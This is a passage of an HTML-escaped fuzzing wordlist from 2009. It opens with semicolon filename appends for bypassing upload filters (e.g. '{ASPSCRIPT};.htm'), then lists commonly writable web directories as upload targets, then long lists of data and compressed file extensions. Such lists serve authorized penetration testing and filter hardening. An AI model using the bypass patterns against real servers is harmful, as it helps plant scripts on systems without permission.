{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
